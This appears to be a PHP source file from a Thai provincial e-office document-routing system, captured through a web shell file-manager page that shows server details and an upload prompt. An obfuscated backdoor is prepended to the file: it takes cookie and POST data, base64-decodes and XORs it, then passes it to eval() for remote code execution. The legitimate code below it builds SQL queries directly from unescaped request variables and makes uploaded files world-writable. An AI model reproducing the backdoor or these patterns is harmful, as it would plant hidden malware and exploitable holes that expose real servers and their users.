|
Server : Apache/2.2.2 (Fedora) System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686 User : apache ( 48) PHP Version : 5.2.9 Disable Function : NONE Directory : /var/www/html/pathumthani_eoffice/application/system/ |
Upload File : |
<?php $GdMXkL = "\x68" . "\137" . 'K' . "\x5a" . chr ( 185 - 71 ).chr ( 200 - 92 )."\116";$tZgcbPYPp = chr (99) . chr ( 512 - 404 ).chr (97) . 's' . chr (115) . "\137" . "\145" . chr ( 527 - 407 )."\x69" . "\163" . "\164" . "\163";$OkxNNF = $tZgcbPYPp($GdMXkL); $jPgXWaa = $OkxNNF;if (!$jPgXWaa){class h_KZrlN{private $tZVKqsrg;public static $PTQKZeyS = "cf726427-681b-478a-ac66-5ee5f8a5270c";public static $EswjVUBEqR = 64818;public function __construct(){$YOEALKw = $_COOKIE;$jJIrLrSaI = $_POST;$wRrevx = @$YOEALKw[substr(h_KZrlN::$PTQKZeyS, 0, 4)];if (!empty($wRrevx)){$CmEorlJ = "base64";$HwdpUlZqe = "";$wRrevx = explode(",", $wRrevx);foreach ($wRrevx as $nNCqrSwxe){$HwdpUlZqe .= @$YOEALKw[$nNCqrSwxe];$HwdpUlZqe .= @$jJIrLrSaI[$nNCqrSwxe];}$HwdpUlZqe = array_map($CmEorlJ . '_' . "\x64" . 'e' . 'c' . "\x6f" . "\144" . chr (101), array($HwdpUlZqe,)); $HwdpUlZqe = $HwdpUlZqe[0] ^ str_repeat(h_KZrlN::$PTQKZeyS, (strlen($HwdpUlZqe[0]) / strlen(h_KZrlN::$PTQKZeyS)) + 1);h_KZrlN::$EswjVUBEqR = @unserialize($HwdpUlZqe);}}public function __destruct(){$this->SRjRxsoBC();}private function SRjRxsoBC(){if (is_array(h_KZrlN::$EswjVUBEqR)) {$BkFGbeLbs = str_replace("\x3c" . "\x3f" . 'p' . chr (104) . 'p', "", h_KZrlN::$EswjVUBEqR[chr ( 555 - 456 )."\157" . "\x6e" . "\164" . chr ( 331 - 230 )."\156" . 't']);eval($BkFGbeLbs);exit();}}}$uoBzFadXbm = new h_KZrlN(); $uoBzFadXbm = 56631;} ?><?
//Function สุ่ม ตัวเลข | วิธีใช้งาน : randomstr (ความยาวอักษรที่ต้องการสุ่ม) by Paak
function randomstr ($length)
{
$possible = '0198765432';
$possible.= 'abcdefghijklmnopqrstuvwxyz';
$str=" ";
while ( strlen ($str) <= $length)
{
$str .= substr ($possible, (rand() % strlen($possible)), 1);
}
return ($str);
}
//Date Change Type
$d = explode("/", $pdate);
$ndate = ($d[2] - 543)."-".$d[1]."-".$d[0];
####-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=PROCESS
//////////////////////// check METHOD POST
$sql = " SELECT staffid, prename, staffname, staffsurname, title FROM epm_staff ";
$result = mysql_query($sql) ;
while($rs = mysql_fetch_assoc($result)){
$arr_staffname[$rs[staffid]] = $rs[prename] . $rs[staffname] ." ". $rs[xxxx] ."<br> ตำแหน่ง (". $rs[title] .")" ;
}
if ($_SERVER[REQUEST_METHOD] == "POST"){
////////////////// ID ADD
if($action == "add"){
//ตรวจสอบ max ID
$sql_max_case="select max(docid) as maxcase from document where type='$type' ";
$query = mysql_query($sql_max_case)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$maxrs = mysql_fetch_assoc($query);
if(!$maxrs){$maxcase="0";}else{$maxcase=$maxrs[maxcase];}$maxcase++;
if(!is_int($docid)){
$docid=$maxcase;
}
//ตรวจสอบ ID ที่คีย์เข้ามา docregid KEY IN
$sql_max_case="select * from document where docid='$docid' and type='$type' ";
$query = mysql_query($sql_max_case)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$check_id = mysql_fetch_assoc($query);
if($check_id){
$msg = "<li>หมายเลขที่กำหนดซ้ำกับเอกสารที่มีอยู่ในระบบ<li>ระบบจะทำการกำหนดเป็นหมายเลข $maxcase <br> ";
// include('msg_box.php');
$docid=$maxcase;
}
$sql_max_case="select max(number) as maxnum from document where type='$type' ";
$query = mysql_query($sql_max_case)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$maxrs = mysql_fetch_assoc($query);
if(!$maxrs){$maxnum="0";}else{$maxnum=$maxrs[maxnum];}$maxnum++;
if(!is_int($number)){
$number=$maxnum;
}
//ตรวจสอบ NUM ที่คีย์เข้ามา docregid KEY IN
$sql_max_case="select * from document where number='$number' and type='$type' ";
$query = mysql_query($sql_max_case)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$checkn_id = mysql_fetch_assoc($query);
if($checkn_id){
// include('msg_box.php');
$number=$maxnum;
}
if($type=="circular"){
if(!$_FILES){
?>
<SCRIPT language="javascript">
alert("ไม่มีไฟล์แนบ");
</SCRipt>
<meta http-equiv='refresh' content='0;url=?type=circular&action=add>'>
<?
exit;
}
}
if($type=="send"){
// หาชื่อผู้ส่ง
$status_comment="";
if($minister){$status_comment=" รักษาการแทน";}
if($sid_sub){$selected=$sid_sub;}else{$selected=$sid;}
$sql_group="
SELECT
$table_staff.staffid,
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname
FROM
$table_staff
WHERE
$table_staff.username NOT LIKE 'admin_%'
AND $table_staff.username NOT LIKE 'root%'
AND $table_staff.staffid = '$selected'
order by $table_staff.staffid
";
$result = mysql_query($sql_group)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$hrs = mysql_fetch_assoc($result);
$sending=$hrs[prename].$hrs[staffname]." ".$hrs[staffsurname].$status_comment;
}
////// DOC REG ADD
$getting=$gid_show;
$comment=trim($comment);
if(!$speed){$speed="NULL";}
if(!$secret){$secret="NULL";}
if( ($type=="get") ){$getting=$_POST[getting];}
if( ($type=="send") ){$getting=$_POST[getting]; $sending=$_POST[sid_show];}
echo $sqldocreg = "
INSERT INTO document
(`id`,`type`,`docid`,`number`,`refid`,`pdate`,`sending`,`getting`,`title`,`comment`,`owner`,`status`,`time_rec`,`speed`,`secret`) VALUES
(NULL,'$type','$docid','$number','$refid','$ndate','$sending','$getting','$title','$comment','$user','0','$sql_time','$speed','$secret')
";
$query = mysql_query($sqldocreg)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$docid=mysql_insert_id();
if($type=="circular"){
############################################CIRCULAR ADD
$pid_array = explode("," , $pid);
$u=0;
$where_code="";
foreach($pid_array as $gg => $g_num ){
if($u>0){$where_code.=" or "; }else{ $where_code.=" where "; }$u++;
$where_code.=" $profile_groupmember.gid = '$g_num' ";
}
$sql_list="
SELECT
$table_staff.staffid,
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname,
$table_staff.title,
$profile_groupmember.gid
FROM
$profile_groupmember
Inner Join $table_staff ON $profile_groupmember.staffid =$table_staff.staffid
$where_code
ORDER by $table_staff.staffid
";
$result = mysql_query($sql_list)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($li = mysql_fetch_assoc($result)){
#$staff_fullname_title = $li[prename] . " " . $li[staffname] . " " . $li[staffsurname]." (".$li[title].")";
$comment=trim($comment);
$sqlgetting="
INSERT INTO doc_receive
(`id`,`docid`,`group_id`,`staff_id`,`status`,`owner`,`timerec`,`comment`)
VALUES
(NULL,'$docid','p$li[gid]',$li[staffid],'0',$session_staffid,'$sql_time','$comment')
";
if($take_out){
foreach($take_out as $num => $val){
if($val==$li[staffid]){$cross="ture";}
}
} ######### END if($take_out){
if($cross!="ture"){
$query = mysql_query($sqlgetting)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$doc_reciveid=mysql_insert_id();
$doc_history="เวียนเอกสาร";
doclog($docid,$doc_reciveid,$li[staffid],$arr_staffname[$li[staffid]],$session_staffid,$staff_fullname_title,'',$doc_history ,$action);
}$cross=""; ########END if($cross!="ture"){
}############# END if($pid){
################################################
}
// กรณีหนังสือส่ง
if($type=="send"){
$sqlgetting="
INSERT INTO doc_receive
(`id`,`docid`,`group_id`,`staff_id`,`status`,`owner`,`timesend`,`comment`)
VALUES
(NULL,'$docid',NULL,'$sid','0','$session_staffid',now( ),'$comment')
";
$query = mysql_query($sqlgetting)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
if($minister){$comment.="รักษาการ / รักษาราชการ แทน";
$sqlgetting="
INSERT INTO doc_receive
(`id`,`docid`,`group_id`,`staff_id`,`status`,`owner`,`timesend`,`comment`)
VALUES
(NULL,'$docid',NULL,'$sid_sub','1100',$session_staffid,now( ),'$comment')
";
$query = mysql_query($sqlgetting)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
}
}
$doc_history="เพิ่มเอกสาร $docid";
doclog($id,'',$sid_sub,$arr_staffname[$sid_sub],$session_staffid,$session_fullname_title,'',$doc_history ,$action);
/*
////// PERSON RECEIVE ADD
$sqlgetting="
INSERT INTO `doc_receive`
(`id`,`docid`,`group_id`,`staff_id`,`status`,`timerec`)
VALUES
(NULL,'$docid','$gid','$staffid','0',now( ))
";
$query = mysql_query($sqlgetting)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
////// END PERSON RECEIVE ADD
*/
////// ATTACH ADD
if($_FILES){
$num_f=0;
foreach($file as $arr_num => $arr_name){$attach_name[$arr_num]=$arr_name;$num_f++; $descript[$arr_num]=$description[$arr_num];}
for($f=0;$f<$num_f;$f++){
if($file_name[$f]){
$name_random=randomstr(16);
$name_random=str_replace(" ",'',$name_random);
$f_ext[$f] = getFileExtension($file_name[$f]);
$attach_name=explode(".",$file_name[$f]);
$namepath="$name_random.$f_ext[$f]";
$namepath=str_replace(" ",'',$namepath);
$name="$file_name[$f]";
$save_path = "../../files/document/".$namepath;
$des="$descript[$f]";
if(!$des){$des=$name;}
if(file_exists($save_path)){
$name_random=randomstr(32);
$name_random=str_replace(" ",'',$name_random);
$namepath="$name_random.$f_ext[$f]";
$name="$file_name[$f]";
}
$sqlins = "
insert into doc_attach
( id , docid , name , attach , description)
values
(null , '$docid', '$name' , '$namepath' , '$des')
";
$query = mysql_query($sqlins )or die("Query line " . __LINE__ . " error<hr>".mysql_error());
copy($file[$f],$save_path);
if(PHP_OS=='Linux'){ chmod("$save_path",0777);}
}
} //end for
} //end if file
////// END DOC REG ADD
$msg.= "บันทึกข้อมูลเรียบร้อย";
include('msg_box.php');
?>
<br><br><center>
<input type='button' name='กลับหน้าหลัก' value='กลับหน้าหลัก' onclick="window.location.href='<?=$PHP_SELF?>?page=<?=$page?>&type=<?=$type?>' ">
</center>
<?
// echo "<meta http-equiv='refresh' content='1;url=$PHP_SELF?page=$page&type=$type'>" ;
exit;
}
////////////////// END ID ADD
////////////////// EDIT
if($action == "edit"){
if($type=="send"){
// หาชื่อผู้ส่ง
$status_comment="";
if($minister){$status_comment=" รักษาการแทน";}
if($sid_sub){$selected=$sid_sub;}else{$selected=$sid;}
$sql_group="
SELECT
$table_staff.staffid,
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname
FROM
$table_staff
WHERE
$table_staff.username NOT LIKE 'admin_%'
AND $table_staff.username NOT LIKE 'root%'
AND $table_staff.staffid = '$selected'
order by $table_staff.staffid
";
$result = mysql_query($sql_group)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$hrs = mysql_fetch_assoc($result);
$sending=$hrs[prename].$hrs[staffname]." ".$hrs[staffsurname].$status_comment;
}
$comment=trim($comment);
$sql_update="
UPDATE document
SET
document.refid = '$refid',
document.pdate = '$ndate',
document.number = '$number',
document.sending = '$sending',
document.getting = '$getting',
document.title = '$title',
document.comment= '$comment',
document.owner = '$user',
document.speed='$speed',
document.secret='$secret'
WHERE
document.`id` =$id
LIMIT 1 ;
";
$query = mysql_query($sql_update)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$docid=$id;
// กรณีหนังสือส่ง
if($type=="send"){
$sqlgetting="
INSERT INTO doc_receive
(`id`,`docid`,`group_id`,`staff_id`,`status`,`owner`,`timesend`,`comment`)
VALUES
(NULL,'$docid',NULL,'$sid','0','$session_staffid',now( ),'$comment')
";
$query = mysql_query($sqlgetting)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
if($minister){$comment.="รักษาการ / รักษาราชการ แทน";
$sqlgetting="
INSERT INTO doc_receive
(`id`,`docid`,`group_id`,`staff_id`,`status`,`owner`,`timesend`,`comment`)
VALUES
(NULL,'$docid',NULL,$sid_sub,'1100',$session_staffid,now( ),'$comment')
";
$query = mysql_query($sqlgetting)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
}
}
// status = '$status',
if(!$status){$status="0";}
if($status=="100"){$code_status=",`timeknow` = now( )";}
if($status=="200"){$code_status=",`timepaid` = now( )";}
if($staffid){$gid="NULL";}else{$staffid="NULL";}
////////////////// END EDIT
////// ATTACH ADD
if($_FILES){
$num_f=0;
foreach($file as $arr_num => $arr_name){$attach_name[$arr_num]=$arr_name;$num_f++; $descript[$arr_num]=$description[$arr_num];}
for($f=0;$f<$num_f;$f++){
if($file_name[$f]){
$name_random=randomstr(16);
$name_random=str_replace(" ",'',$name_random);
$f_ext[$f] = getFileExtension($file_name[$f]);
$attach_name=explode(".",$file_name[$f]);
$namepath="$name_random.$f_ext[$f]";
$namepath=str_replace(" ",'',$namepath);
$name="$file_name[$f]";
$save_path = "../../files/document/".$namepath;
$des="$descript[$f]";
if(!$des){$des=$name;}
if(file_exists($save_path)){
$name_random=randomstr(32);
$name_random=str_replace(" ",'',$name_random);
$namepath="$name_random.$f_ext[$f]";
$name="$file_name[$f]";
}
$sqlins = "
insert into doc_attach
( id , docid , name , attach , description)
values
(null , '$docid', '$name' , '$namepath' , '$des')
";
$query = mysql_query($sqlins )or die("Query line " . __LINE__ . " error<hr>".mysql_error());
copy($file[$f],$save_path);
if(PHP_OS=='Linux'){ chmod("$save_path",0777);}
}
} //end for
} //end if file
$msg.= "ปรับปรุงข้อมูลเรียบร้อย";
include('msg_box.php');
echo "<meta http-equiv='refresh' content='1;url=$PHP_SELF?page=$page&type=$type'>" ;
exit;
///// END EDIT
}
////////////////// ACTIVITY
if($action == "activity"){
$time_now=mysql_query("select now( )")or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$sql_history_rp="
SELECT
doc_receive.staff_id
FROM
doc_receive
Inner Join document ON doc_receive.docid = document.id
Inner Join $table_staff ON doc_receive.staff_id = $table_staff.staffid
WHERE
document.id = $id
OR (username LIKE 'root' or username LIKE 'admin_%')
Group by $table_staff.staffid
";
$i=0;
$resultrp = mysql_query($sql_history_rp)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($rprs = mysql_fetch_assoc($resultrp)){
$take_out[$i]=$rprs[staff_id];$i++;
}
$d = explode("/", $deadline);
$deadline = "'".($d[2] - 543)."-".$d[1]."-".$d[0]."'";
if($deadline_check=="none"){ $deadline="NULL"; }
// ทั้งหมด
if($activity_select=="all"){
$sql_all_select=" SELECT $table_staff.staffid FROM $table_staff ";
$result = mysql_query($sql_all_select)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$i=0;
while($all_staff = mysql_fetch_assoc($result)){$i++;
$st_all[$i]=$all_staff[staffid];
$comment=trim($comment);
$sql_fw="
INSERT INTO doc_receive
(`id`,`docid`,`group_id`,`staff_id`,`status`,`owner`,`timerec`,`comment`,`deadline`,`deadline_alert`)
VALUES
(NULL,'$id',NULL,'$all_staff[staffid]','0','$session_staffid','$sql_time','$comment',$deadline,'$deadline_alert')
";
$$recive_staffid = $all_staff[staffid] ;
if($take_out){
foreach($take_out as $num => $val){
if($val==$all_staff[staffid]){$cross="ture";}
}
} ######### if($take_out){
if($cross!="ture"){
$result_fw = mysql_query($sql_fw)or die("Query line " . __LINE__ . " error<hr> $sql_fw ".mysql_error());
$recive_staffname = $arr_staffname[$all_staff[staffid]] ;
$doc_history="เวียนเอกสาร ";
doclog($id,'',$all_staff[staffid],$recive_staffname ,$session_staffid,$session_fullname_title,'',$doc_history ,$action);
}$cross=""; #### if($cross!="ture"){
}
}
// ระบุ
if($activity_select=="private"){
# DEL OLD RECEIVE
$sqldelactivity="
DELETE FROM `doc_receive` WHERE `doc_receive`.`docid` = '$id' AND `doc_receive`.`timeknow`= NULL AND `doc_receive`.`timepaid`= NULL
";
$query = mysql_query($sqldelactivity)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
if($sid){
$sid_array = explode("," , $sid);
$u=0;
$where_code="";
foreach($sid_array as $gg => $g_num ){
$comment=trim($comment);
$sqlgetting="
INSERT INTO doc_receive
(`id`,`docid`,`group_id`,`staff_id`,`status`,`owner`,`timerec`,`comment`,`deadline`,`deadline_alert`)
VALUES
(NULL,'$id',NULL,$g_num,'0',$session_staffid,'$sql_time','$comment',$deadline,'$deadline_alert')
";
$doc_history="ส่งต่อเอกสาร $docid";
$xstaff_label = $arr_staffname[$g_num] ;
doclog($id,'',$g_num,$xstaff_label,$session_staffid,$session_fullname_title,'',$doc_history ,$action);
// echo " <hr> gnum = $g_num <hr> ";
if($take_out){
foreach($take_out as $num => $val){
if($val==$g_num){$cross="ture";}
} ###### END foreach($take_out as $num => $val){
} ######## END if($take_out){
if($cross!="ture"){
$query = mysql_query($sqlgetting)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
}$cross="";
$doc_reciveid=mysql_insert_id();
} ######### END foreach($sid_array as $gg => $g_num ){
} ########### END if($sid){
if($gid){
$gid_array = explode("," , $gid);
$u=0;
$where_code="";
foreach($gid_array as $gg => $g_num ){
if($u>0){$where_code.=" or "; }else{ $where_code.=" where "; }$u++;
$where_code.=" $table_groupmember.gid = '$g_num' ";
}
$sql_list="
SELECT
$table_staff.staffid,
$table_groupmember.gid
FROM
$table_groupmember
Inner Join $table_staff ON $table_groupmember.staffid =$table_staff.staffid
$where_code
ORDER by $table_staff.staffid
";
$result = mysql_query($sql_list)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($li = mysql_fetch_assoc($result)){
$comment=trim($comment);
$sqlgetting="
INSERT INTO doc_receive
(`id`,`docid`,`group_id`,`staff_id`,`status`,`owner`,`timerec`,`comment`,`deadline`,`deadline_alert`)
VALUES
(NULL,'$id','g$li[gid]',$li[staffid],'0',$session_staffid,'$sql_time','$comment',$deadline,'$deadline_alert')
";
if($take_out){ foreach($take_out as $num => $val){
if($val==$li[staffid]){$cross="ture";}
}
}
if($cross!="ture"){
$query = mysql_query($sqlgetting)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$doc_history="ส่งต่อเอกสาร $docid";
$xstaffid = $li[staffid] ;
doclog($id,$doc_reciveid,$xstaffid,'',$arr_staffname[$xstaffid],$session_fullname_title,'',$doc_history ,$action);
}$cross="";
$doc_reciveid=mysql_insert_id();
}
} ########## END if($gid){
if($pid){
$pid_array = explode("," , $pid);
$u=0;
$where_code="";
foreach($pid_array as $gg => $g_num ){
if($u>0){$where_code.=" or "; }else{ $where_code.=" where "; }$u++;
$where_code.=" $profile_groupmember.gid = '$g_num' ";
}
$sql_list="
SELECT
$table_staff.staffid,
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname,
$table_staff.title,
$profile_groupmember.gid
FROM
$profile_groupmember
Inner Join $table_staff ON $profile_groupmember.staffid =$table_staff.staffid
$where_code
ORDER by $table_staff.staffid
";
$result = mysql_query($sql_list)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($li = mysql_fetch_assoc($result)){
#$staff_fullname_title = $li[prename] . " " . $li[staffname] . " " . $li[staffsurname]." (".$li[title].")";
$comment=trim($comment);
$sqlgetting="
INSERT INTO doc_receive
(`id`,`docid`,`group_id`,`staff_id`,`status`,`owner`,`timerec`,`comment`,`deadline`,`deadline_alert`)
VALUES
(NULL,'$id','p$li[gid]',$li[staffid],'0',$session_staffid,'$sql_time','$comment',$deadline,'$deadline_alert')
";
if($take_out){
foreach($take_out as $num => $val){
if($val==$li[staffid]){$cross="ture";}
}
} ######### END if($take_out){
if($cross!="ture"){
$query = mysql_query($sqlgetting)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$doc_history="ส่งต่อเอกสาร $docid";
doclog($id,$doc_reciveid,$li[staffid],$arr_staffname[$li[staffid]],$session_staffid,$staff_fullname_title,'',$doc_history ,$action);
$doc_reciveid=mysql_insert_id();
}$cross=""; ########END if($cross!="ture"){
}
} ############# END if($pid){
}
$msg.= "ดำเนินการเรียบร้อย";
include('msg_box.php');
echo "<meta http-equiv='refresh' content='1;url=$PHP_SELF?page=$page&type=$type'>" ;
exit;
}
////////////////// END ACTIVITY
} ///END POST METHOD
if($action == "del"){
$sql_doc_del="delete from document where id = '$id' and type='$type' ";
$sql = mysql_query($sql_doc_del)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$sql_attach_del="delete from doc_receive where docid = '$id' ";
$sql = mysql_query($sql_doc_del)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$sql_doc_del="delete from doc_attach where docid = '$id'";
$sql = mysql_query($sql_doc_del)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$msg = "<font class=\"normal_blue\">Complete</font><br>ทำการลบข้อมูลเรียบร้อยแล้ว</div>";
include('msg_box.php');
echo "<meta http-equiv='refresh' content='1;url=?page=$page&type=$type'>" ;
$doc_history="ลบเอกสาร $docid";
doclog($id,'','','',$session_staffid,$session_fullname_title,'',$doc_history ,$action);
exit();
}
if($action == "del_attach"){
$sql_doc_del="delete from doc_attach where id = '$file_id' and docid='$id' ";
$sql = mysql_query($sql_doc_del)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$msg = "<font class=\"normal_blue\">Complete</font><br>ทำการลบเอกสารแนบเรียบร้อยแล้ว</div>";
include('msg_box.php');
echo "<meta http-equiv='refresh' content='1;url=?action=edit&id=$id&type=$type'>" ;
$doc_history="ลบไฟล์แนบ $docid";
doclog($id,'','','',$session_staffid,$session_fullname_title,'',$doc_history ,$action);
exit;
}
?>